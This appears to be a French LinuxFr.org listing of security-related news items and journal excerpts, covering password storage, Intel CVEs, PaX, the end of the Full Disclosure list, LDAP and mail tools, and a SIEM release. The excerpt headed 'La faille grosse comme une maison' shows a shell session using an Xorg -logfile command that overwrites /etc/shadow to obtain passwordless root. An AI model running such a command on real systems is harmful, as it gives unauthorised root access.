Journal L'art de stocker des mots de passe

87
17
jan.
2014

Bonjour à tous,

Je vous propose un enième article sur un sujet bien connu : comment sécuriser des mots de passe dans une base de données. Et au passage, comment éviter de se taper la honte si votre BDD est leakée.

Après une longue réflexion, j'ai décidé de présenter ce journal sous forme de niveaux. Deux négatifs (-2 et -1) qui correspondent à des solutions (trop) souvent mises en place mais pas sécurisées du tout.
Puis, un niveau 0 qui (...)

Automne, saison chaude chez Intel

Posté par (page perso) . Édité par ZeroHeure, Ysabeau, Nils Ratusznik, M5oul, Davy Defaud et palm123. Modéré par Ysabeau. Licence CC by-sa.
58
27
nov.
2019
Matériel

Mardi 12 novembre, Arte diffuse le concert du Bal des enragés au Helfest 2019.
L’attention du public ainsi détournée, Intel en profite pour lancer une vague de correctifs, 77 correctifs, un grand nombre de CVE (des failles) y est dévoilé. Les failles concernent les processeurs eux‑mêmes (et microcontrôleurs) et les micrologiciels trop nombreux qui tournent dans vos cartes‐mères.

Journal Les performances d'un noyau avec le patch PaX

Posté par (page perso) . Licence CC by-sa.
Tags :
49
25
août
2012

PaX est un patch externe applicable sur le noyau Linux et qui vise à protéger les zones mémoires contre diverses attaques.
Une présentation intéressante, "20 years of PaX", a été donnée à la conférence SSTIC de cet été. Et un commentaire de cette présentation est disponible ici.

J'ai toujours été curieux de savoir quel pouvait être le coût en performances de PaX quand il est appliqué au noyau Linux. Le dernier document intéressant datait de 2005 (donc (...)

Full disclosure, c'est fini

Posté par (page perso) . Édité par Benoît Sibaud, palm123, Nils Ratusznik et tuiu pol. Modéré par Nils Ratusznik. Licence CC by-sa.
48
20
mar.
2014
Sécurité

John Cartwright a annoncé la fermeture de la liste de diffusion Full disclosure. Cette liste était destinée à la publication de failles de sécurité et à la discussion sur ce sujet. Dans son message de fermeture, John Cartwright annonce qu'il en a marre des membres de la « communauté » qui demandent la modération d'anciens messages et pense que ça devient de plus en plus difficile de maintenir un forum ouvert dans le climat légal actuel.

La liste a été créée le 9 juillet 2002 par Len Rose, et était administrée par John Cartwright. Elle était sponsorisée par Secunia, une boîte de sécurité elle aussi créée en 2002.

Wikipédia cite trois failles 0 day révélées initialement sur cette liste concernant Microsoft Windows Help and Support Center en 2010, Apache HTTP Server en 2011 et la base de données Oracle en 2012. Une petite recherche sur LinuxFr.org en signale aussi une sur FreeBSD en 2009, parmi diverses autres failles évoquées touchant des logiciels libres ou non.

Éternelle question autour du « full disclosure », de la divulgation publique opposée à la sécurité par l'obscurité ? 2002, procès Kitetoa, 2004, procès Guillermito « C'est le procès du full-disclosure », 2004, adoption de la loi sur la confiance dans l'économie numérique en France « Quel avenir pour le full-disclosure en France ? » Etc., etc.

OpenJDK JEP 180: HashMap, collisions & attaques par la complexité

46
6
mai
2014
Java

Cette dépêche parle de la JEP 180 d'OpenJDK 8 qui propose une solution intéressante aux problèmes d'attaques sur la complexité que rencontrent les tables de hachage.

On a déjà parlé de ce sujet ici même à plusieurs reprises. Je vais cependant rapidement représenter le problème et l'évolution des discussions. Le lecteur averti sur le sujet ira directement au dernier paragraphe pour voir la proposition de la JEP 180.

NdM : merci à ckyl pour son journal.

HTTPS Everywhere en version 2.0.1

Posté par (page perso) . Édité par Florent Zara, Nÿco et detail_pratique. Modéré par Lucas Bonnet. Licence CC by-sa.
42
6
mar.
2012
Internet

HTTPS Everywhere est une extension Firefox éditée par l'Electronic Frontier Foundation qui permet de remplacer automatiquement l'URL d'un site web par son équivalent HTTPS. Ce n'est pas forcément simple parce que pour beaucoup de sites, il ne suffit pas d'ajouter un s à http. Par exemple, jusqu'à récemment, la version HTTPS de Google n'était accessible que sur https://encrypted.google.com.

Logo HTTPS Everywhere

L'extension maintient donc une base de données pour effectuer les correspondances. Cette version 2.0.1 apporte une base plus grande (404 nouvelles règles depuis la version 1.2.2) mais aussi un Decentralized SSL Observatory (observatoire SSL décentralisé) qui permet d'envoyer de manière anonyme les certificats à une base de données de l'EFF pour qu'ils soient étudiés par cette dernière afin de détecter les éventuelles failles. L'observatoire permet aussi de signaler les éventuels problèmes en temps réel. Pour l'instant seuls les certificats qui ont été générés à partir d'une clef privée faible — à cause d'une machine ayant un générateur de nombre aléatoire buggé — sont signalés. Enfin, cette version 2 fonctionne désormais aussi sur le navigateur de Google : Chrome.

NdA : Merci à detail_pratique pour son aide lors de la rédaction de cette dépêche.

Sortie de LDAP Tool Box Self Service Password 1.0

Posté par (page perso) . Édité par Davy Defaud, Benoît Sibaud et Nils Ratusznik. Modéré par Benoît Sibaud. Licence CC by-sa.
31
18
oct.
2016
Sécurité

Le logiciel Self Service Password est développé au sein du projet LDAP Tool Box. Il fournit une interface permettant aux utilisateurs de changer leur mot de passe dans un annuaire LDAP, y compris Active Directory ou Samba 4.

Outre le changement de mot de passe simple, l’interface propose de réinitialiser son mot de passe en cas de perte, soit par l’envoi d’un courriel, soit par la réponse à des questions, soit par l’envoi d’un SMS.

Les contraintes de qualité du mot de passe sont paramétrables : taille minimale, maximale, présence de différentes classes de caractères, caractères interdits, contrôle de la valeur par rapport à l’ancien mot de passe ou à l’identifiant.

Le logiciel Self Service Password est écrit en PHP et est sous licence publique générale GNU. La version 1.0 est sortie le 14 octobre 2016.

Journal La faille grosse comme une maison

Posté par . Licence CC by-sa.
30
26
oct.
2018

[Dev@localhost ~]$ id

uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow

----------. 1 root root 1241 Oct 10 01:15 shadow

[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadow

cat: shadow: Permission denied

[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1

X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (...)

Journal Une exploitation massive de failles dans iOS depuis plus de 2 ans

Posté par (page perso) . Licence CC by-sa.
29
31
août
2019

Google a publié, via le blog de projet zero, une analyse détaillée de plusieurs failles iOS qui ont été exploitées pendant plus de 2 ans pour récupérer massivement des données sur des milliers de terminaux :
https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html?m=1

Je ne sais pas vous, mais j'avais pour ma part l'image d'une plateforme assez solide niveau sécurité. L'analyse des failles montre qu'en fait, c'est loin d'être le cas.

À noter que plusieurs failles sont dans Safari, il semblerait qu'un bon moyen de se (...)

Journal Comment bloquer 280M de dollars en éther

28
8
nov.
2017

Bonjour fameux Nal',

Aujourd'hui, enfin hier, un développeur a bloqué tous les portefeuilles Parity multisignés.

Grossièrement, il a modifié la lib de Parity et s'est octroyé la propriété de tous les portefeuilles multisignés avec Parity. Il a supprimé son contrat auto-exécutant ce qui bloqué tous les portefeuilles multisignés…

En résumé, le Tweet du concerné explique le résultat :

It's simple really, imagine walking up to a bank vault and there's a button that says "Lock Forever"……. someone accidentally pushes it.

(...)

Sortie de LDAP Tool Box Self Service Password 1.1

Posté par (page perso) . Édité par Davy Defaud et Xavier Claude. Modéré par Xavier Claude. Licence CC by-sa.
24
4
sept.
2017
Sécurité

Le logiciel Self Service Password est développé au sein du projet LDAP Tool Box. Il fournit une interface permettant aux utilisateurs de changer leur mot de passe dans un annuaire LDAP, y compris Active Directory ou Samba 4, ainsi que leur clé SSH.

Outre le changement de mot de passe simple, l’interface propose de réinitialiser son mot de passe en cas de perte, soit par l’envoi d’un courriel, soit par la réponse à des questions, soit par l’envoi d’un SMS.

Les contraintes de qualité du mot de passe sont paramétrables : taille minimale, maximale, présence de différentes classes de caractères, caractères interdits, contrôle de la valeur par rapport à l’ancien mot de passe ou à l’identifiant.

Le logiciel Self Service Password est écrit en PHP et est sous licence publique générale GNU. La version 1.1 est sortie le 1er septembre 2017.

Sortie de Modoboa 1.1.0

Posté par (page perso) . Édité par Benoît Sibaud et Ontologia. Modéré par Xavier Claude. Licence CC by-sa.
22
3
jan.
2014
Internet

Une nouvelle version du logiciel libre (licence MIT) Modoboa est disponible. Modoboa est un outil visant à simplifier l’administration et l’utilisation d’une plate‐forme d’hébergement de courriel. Il est disponible dans neuf langues (anglais, français, allemand, espagnol, portugais, suédois, italien, russe et tchèque). Il est majoritairement écrit en Python/Django (avec un peu de JavaScript quand même pour la partie « dynamique »).

Il s'agit d'une version majeure pour plusieurs raisons. Tout d'abord, un certain nombre de fonctionnalités ont été ajoutées comme :

  • Le support des domaines relais (un mode gateway en quelque sorte) ;
  • Diverses améliorations au niveau de la quarantaine ;
  • Le support d'une date de démarrage pour les réponses automatiques ;
  • Activation/désactivation des réponses automatiques par les administrateurs ;
  • Le renforcement des algorithmes utilisés pour chiffrer les mots de passe ;
  • Le déploiement silencieux.

D'autre part, le code source a subit une restructuration importante et les tests de non-régression ont été complétés.

La chasse aux bogues continue et le russe fait désormais partie des langues disponibles pour afficher l'interface web. Faute d'équipe, la traduction portugaise est incomplète dans cette version, nous cherchons d'ailleurs des repreneurs ;)

Au chapitre des changements importants mais indépendants du code, Github est désormais utilisé pour la gestion du code source et des tickets, l'ancienne instance Redmine est donc obsolète.

Sortie de LTB Self Service Password 0.9

Posté par (page perso) . Édité par Benoît Sibaud et Xavier Teyssier. Modéré par Xavier Teyssier. Licence CC by-sa.
Tags :
20
9
oct.
2015
Sécurité

Le logiciel Self Service Password est développé au sein du projet LDAP Tool Box : il fournit une interface permettant aux utilisateurs de changer leur mot de passe dans un annuaire LDAP (y compris Active Directory).

Outre le changement de mot de passe simple, l'interface propose de réinitialiser son mot de passe en cas de perte, soit par l'envoi d'un courriel, soit par la réponse à des questions, soit par l'envoi d'un SMS.

Le logiciel Self Service Password est écrit en PHP et est sous licence GPL. La version 0.9 est sortie le 8 septembre 2015.

Le SIEM Prelude est de retour dans les bacs en version 1.0.1

Posté par . Édité par Benoît Sibaud et tuiu pol. Modéré par tuiu pol.
18
23
juil.
2012
Sécurité

Prelude OSS est de retour sur Internet avec une nouvelle version 1.0.1.

Prelude est un logiciel SIEM (Security Information & Event Management) qui permet de superviser la sécurité de votre système d'information. Prelude collecte, normalise, trie, agrège, corrèle et affiche tous les événements de sécurité indépendamment des types d'équipements surveillés. Au-delà de sa capacité de traitement de tous types de journaux d’événements (logs système, syslog, fichiers plats, etc.), Prelude est nativement compatible avec de nombreuses sondes anti-intrusion open-source (snort, suricata, ossec, samhain, etc.) grâce à l'utilisation du format IDMEF (RFC 4765).

Démarré en 1998 sous la forme d'un projet libre d'une sonde IDS, Prelude devient le premier SIEM hybride open-source à partir de 2003, année à laquelle se crée la société Prelude Technologies qui commercialise la version Entreprise.

Prelude sera repris en 2009 par la société Edenwall et sera malheureusement entraîné dans sa mise en faillite. Le logiciel est alors racheté par la société CS, intégrateur de systèmes critiques, en début d'année 2012, société qui propose déjà une solution open-source de supervision de performances complémentaire avec Vigilo. Suite au rachat, le site Prelude est remis en ligne mais sans les sources de la version OSS. Cette nouvelle version signe donc le retour de Prelude OSS sur Internet.

Les nouveautés de la v1.0.1 :

  • Correction de nombreux bugs
  • Rafraîchissement des interfaces Web
  • Amélioration des traductions
  • Ajout de nouvelles règles LML
  • Mise à jour des copyrights
  • Transfert des fonctions relaying dans la version Entreprise

Demandez votre badge gratuit pour OW2con'16, les 21-22 septembre 2016, Espace Mozilla à Paris

Posté par . Édité par tankey, Nÿco, Benoît Sibaud et palm123. Modéré par ZeroHeure. Licence CC by-sa.
7
4
sept.
2016
Communauté

Ne ratez pas OW2con'16, le rendez-vous annuel de la communauté open source OW2 !

OW2 est une communauté open source indépendante dédiée au développement de logiciels d'infrastructure de qualité industrielle. Elle regroupe des entreprises et des organismes de recherche de premier plan tels que l'Inria, Orange, Prologue, Institut Mines Telecom, Airbus Défense ou Peking University. Organisée pour la huitième année consécutive, la conférence annuelle OW2 est une rencontre d'experts, d'architectes, de développeurs et de chefs de projets du monde entier.

OW2con'16 est un rendez-vous de la communauté OW2 et des professionnels du logiciel open source, du cloud computing, du big data et de l'internet du futur. Cette année nous ajoutons l'accessibilité et la gestion de la sécurité à notre porte-feuille de sujets chauds.

logo ow2